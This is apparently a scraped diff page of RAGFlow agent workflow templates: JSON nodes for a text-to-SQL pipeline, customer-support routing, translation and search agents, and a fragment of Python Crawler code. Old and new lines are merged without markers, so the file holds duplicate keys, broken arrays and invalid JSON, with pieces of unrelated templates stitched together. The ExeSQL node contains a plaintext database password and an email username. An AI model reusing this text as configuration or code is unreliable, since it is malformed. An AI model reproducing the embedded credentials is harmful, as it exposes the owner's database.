DESC;\n\n\n### OUTPUT GUIDELINES\n1. Think through the schema and the request. \n2. Write **only** the final MySQL query. \n3. Do **not** wrap the query in back-ticks or markdown fences. \n4. Do **not** add explanations, comments, or additional text\u2014just the SQL.",
"temperature":0.1,
"temperatureEnabled":false,
"tools":[],
"topPEnabled":false,
"top_p":0.3,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"SQL Generator "
},
"dragging":false,
"id":"Agent:WickedGoatsDivide",
"measured":{
"height":84,
"width":200
},
"position":{
"x":981,
"y":174
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"database":"",
"db_type":"mysql",
"host":"",
"max_records":1024,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"password":"20010812Yy!",
"port":3306,
"sql":"Agent:WickedGoatsDivide@content",
"username":"13637682833@163.com"
},
"label":"ExeSQL",
"name":"ExeSQL"
},
"dragging":false,
"id":"ExeSQL:TiredShirtsPull",
"measured":{
"height":56,
"width":200
},
"position":{
"x":1211.5,
"y":212.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"ragNode"
},
{
"data":{
"form":{
"content":[
"{ExeSQL:TiredShirtsPull@formalized_content}"
]
},
"label":"Message",
"name":"Message"
},
"dragging":false,
"id":"Message:ShaggyMasksAttend",
"measured":{
"height":56,
"width":200
},
"position":{
"x":1447.3125,
"y":181.5
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"text":"Searches for relevant database creation statements.\n\nIt should label with a knowledgebase to which the schema is dumped in. You could use \" General \" as parsing method, \" 2 \" as chunk size and \" ; \" as delimiter."
},
"label":"Note",
"name":"Note Schema"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":188,
"id":"Note:ThickClubsFloat",
"measured":{
"height":188,
"width":392
},
"position":{
"x":689,
"y":-180.31251144409183
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":392
},
{
"data":{
"form":{
"text":"Searches for samples about question to SQL. \n\nYou could use \" Q&A \" as parsing method.\n\nPlease check this dataset:\nhttps://huggingface.co/datasets/InfiniFlow/text2sql"
},
"label":"Note",
"name":"Note: Question to SQL"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":154,
"id":"Note:ElevenLionsJoke",
"measured":{
"height":154,
"width":345
},
"position":{
"x":693.5,
"y":138
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":345
},
{
"data":{
"form":{
"text":"Searches for description about meanings of tables and fields.\n\nYou could use \" General \" as parsing method, \" 2 \" as chunk size and \" ### \" as delimiter."
},
"label":"Note",
"name":"Note: Database Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":158,
"id":"Note:ManyRosesTrade",
"measured":{
"height":158,
"width":408
},
"position":{
"x":691.5,
"y":435.69736389555317
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":408
},
{
"data":{
"form":{
"text":"The Agent learns which tables may be available based on the responses from three knowledge bases and converts the user's input into SQL statements."
},
"label":"Note",
"name":"Note: SQL Generator"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":132,
"id":"Note:RudeHousesInvite",
"measured":{
"height":132,
"width":383
},
"position":{
"x":1106.9254833678003,
"y":290.5891036507015
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":383
},
{
"data":{
"form":{
"text":"Connect to your database to execute SQL statements."
"prompt":"You are an intelligent assistant. Please answer the user's question based on what Baidu searched. First, please output the user's question and the content searched by Baidu, and then answer yes, no, or i don't know.Here is the user's question:{user_input}The above is the user's question.Here is what Baidu searched for:{baidu}The above is the content searched by Baidu.",
"description":"The question is about the product usage, appearance and how it works.",
"examples":"Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
"to":"message:0"
"to":["agent:0"]
},
"others":{
"description":"The question is not about the product usage, appearance and how it works.",
"examples":"How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to":"message:1"
"to":["message:0"]
}
}
}
},
"downstream":["message:0","message:1"],
"upstream":["answer:0"]
"downstream":[],
"upstream":["begin"]
},
"message:0":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"Message 0!!!!!!!"
"content":[
"Sorry, I don't know. I'm an AI bot."
]
}
},
"downstream":["answer:0"],
"downstream":[],
"upstream":["categorize:0"]
},
"agent:0":{
"obj":{
"component_name":"Agent",
"params":{
"llm_id":"deepseek-chat",
"sys_prompt":"You are a smart researcher. You could generate proper queries to search. According to the search results, you could deside next query if the result is not enough.",
"description":"The question is about the product usage, appearance and how it works.",
"examples":"Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
"to":"retrieval:0"
},
"casual":{
"description":"The question is not about the product usage, appearance and how it works. Just casual chat.",
"examples":"How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to":"generate:casual"
},
"complain":{
"description":"Complain even curse about the product or service you provide. But the comment is not specific enough.",
"examples":"How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
"to":"generate:complain"
},
"answer":{
"description":"This answer provide a specific contact information, like e-mail, phone number, wechat number, line number, twitter, discord, etc,.",
"examples":"My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
"prompt":"You are a customer support. But the customer wants to have a casual chat with you instead of consulting about the product. Be nice, funny, enthusiasm and concern.",
"temperature":0.9,
"message_history_window_size":12,
"cite":false
}
},
"downstream":["answer:0"],
"upstream":["categorize:0"]
},
"generate:complain":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are a customer support. the Customers complain even curse about the products but not specific enough. You need to ask him/her what's the specific problem with the product. Be nice, patient and concern to soothe your customers’ emotions at first place.",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature":0.02
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"generate:ask_contact":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are a customer support. But you can't answer to customers' question. You need to request their contact like E-mail, phone number, Wechat number, LINE number, twitter, discord, etc,. Product experts will contact them later. Please do not ask the same question twice.",
"temperature":0.9,
"message_history_window_size":12,
"cite":false
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"message:get_contact":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"Okay, I've already write this down. What else I can do for you?",
"Get it. What else I can do for you?",
"Thanks for your trust! Our expert will contact ASAP. So, anything else I can do for you?",
"prologue":"Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
}
},
"downstream":["answer:0"],
"upstream":[]
},
"answer:0":{
"obj":{
"component_name":"Answer",
"params":{}
},
"downstream":["generate:0"],
"upstream":["begin","generate:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"prologue":"Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
}
},
"downstream":["answer:0"],
"upstream":[]
},
"answer:0":{
"obj":{
"component_name":"Answer",
"params":{}
},
"downstream":["generate:0"],
"upstream":["begin","generate:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"sys_prompt":"You are an helpful research assistant. \nPlease decompose user's topic: '{sys.query}' into several meaningful sub-topics. \nThe output format MUST be an string array like: [\"sub-topic1\", \"sub-topic2\", ...]. Redundant information is forbidden.",
"sys_prompt":"Your goal is to provide answers based on information from the internet. \nYou must use the provided search results to find relevant online information. \nYou should never use your own knowledge to answer questions.\nPlease include relevant url sources in the end of your answers.\n\n \"{tavily:0@formalized_content}\" \nUsing the above information, answer the following question or topic: \"{iterationitem:0@result} \"\nin a detailed report — The report should focus on the answer to the question, should be well structured, informative, in depth, with facts and numbers if available, a minimum of 200 words and with markdown syntax and apa format. Write all source urls at the end of the report in apa format. You should write your report only based on the given information and nothing else.",
"prompt":"- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature":0.2,
"top_n":1
}
},
"downstream":["wikipedia:0"],
"upstream":["answer:0"]
},
"wikipedia:0":{
"obj":{
"component_name":"Wikipedia",
"params":{
"top_n":10
}
},
"downstream":["generate:0"],
"upstream":["keyword:0"]
},
"generate:1":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content from Wikipedia. When the answer from Wikipedia is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Wikipedia is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Wikipedia!\". Answers need to consider chat history.\n The content of Wikipedia is as follows:\n {input}\n The above is the content of Wikipedia.",
"prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"sys_prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {retrieval:0@formalized_content}\n The above is the knowledge base.",
"description":"The question is about the product usage, appearance and how it works.",
"examples":"Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
"to":"retrieval:0"
"examples":[],
"to":["retrieval:0"]
},
"others":{
"description":"The question is not about the product usage, appearance and how it works.",
"examples":"How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to":"message:0"
"examples":[],
"to":["message:0"]
}
}
}
},
"downstream":["retrieval:0","message:0"],
"upstream":["answer:0"]
"downstream":[],
"upstream":["begin"]
},
"message:0":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"content":[
"Sorry, I don't know. I'm an AI bot."
]
}
},
"downstream":["answer:0"],
"downstream":[],
"upstream":["categorize:0"]
},
"retrieval:0":{
@ -60,29 +52,44 @@
"keywords_similarity_weight":0.3,
"top_n":6,
"top_k":1024,
"rerank_id":"BAAI/bge-reranker-v2-m3",
"kb_ids":["869a236818b811ef91dffa163e197198"]
"rerank_id":"",
"empty_response":"Nothing found in dataset",
"kb_ids":["1a3d1d7afb0611ef9866047c16ec874f"]
}
},
"downstream":["generate:0"],
"upstream":["switch:0"]
"upstream":["categorize:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"component_name":"Agent",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
"sys_prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {retrieval:0@formalized_content}\n The above is the knowledge base.",
"empty_response":"Sorry, knowledge base has noting related information."
}
},
"downstream":["relevant:0"],
"upstream":["answer:0"]
},
"relevant:0":{
"obj":{
"component_name":"Relevant",
"params":{
"llm_id":"deepseek-chat",
"temperature":0.02,
"yes":"generate:0",
"no":"message:0"
}
},
"downstream":["message:0","generate:0"],
"upstream":["retrieval:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature":0.2
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"message:0":{
"obj":{
"component_name":"Message",
"params":{
"messages":[
"Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
"Can't find answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
"empty_response":"Sorry, knowledge base has noting related information."
}
},
"downstream":["relevant:0"],
"upstream":["answer:0"]
},
"relevant:0":{
"obj":{
"component_name":"Relevant",
"params":{
"llm_id":"deepseek-chat",
"temperature":0.02,
"yes":"generate:0",
"no":"keyword:0"
}
},
"downstream":["keyword:0","generate:0"],
"upstream":["retrieval:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature":0.2
}
},
"downstream":["answer:0"],
"upstream":["relevant:0"]
},
"keyword:0":{
"obj":{
"component_name":"KeywordExtract",
"params":{
"llm_id":"deepseek-chat",
"prompt":"- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature":0.2,
"top_n":1
}
},
"downstream":["baidu:0"],
"upstream":["relevant:0"]
},
"baidu:0":{
"obj":{
"component_name":"Baidu",
"params":{
"top_n":10
}
},
"downstream":["generate:1"],
"upstream":["keyword:0"]
},
"generate:1":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content searched from Baidu. When the answer from a Baidu search is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Baidu is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Baidu search!\". Answers need to consider chat history.\n The content of Baidu search is as follows:\n {input}\n The above is the content of Baidu search.",
"empty_response":"Sorry, knowledge base has noting related information."
}
},
"downstream":["relevant:0"],
"upstream":["answer:0","rewrite:0"]
},
"relevant:0":{
"obj":{
"component_name":"Relevant",
"params":{
"llm_id":"deepseek-chat",
"temperature":0.02,
"yes":"generate:0",
"no":"rewrite:0"
}
},
"downstream":["generate:0","rewrite:0"],
"upstream":["retrieval:0"]
},
"generate:0":{
"obj":{
"component_name":"Generate",
"params":{
"llm_id":"deepseek-chat",
"prompt":"You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"sys_prompt":"You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {tavily:0@formalized_content}\n The above is the knowledge base.",
"description":"""arXiv is a free distribution service and an open-access archive for nearly 2.4 million scholarly articles in the fields of physics, mathematics, computer science, quantitative biology, quantitative finance, statistics, electrical engineering and systems science, and economics. Materials on this site are not peer-reviewed by arXiv.""",
"parameters":{
"query":{
"type":"string",
"description":"The search keywords to execute with arXiv. The keywords should be the most important words/terms(includes synonyms) from the original request.",
@ -34,7 +35,7 @@ class CrawlerParam(ComponentParamBase):
self.check_valid_value(self.extract_type,"Type of content from the crawler",['html','markdown','content'])
classCrawler(ComponentBase,ABC):
classCrawler(ToolBase,ABC):
component_name="Crawler"
def_run(self,history,**kwargs):
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.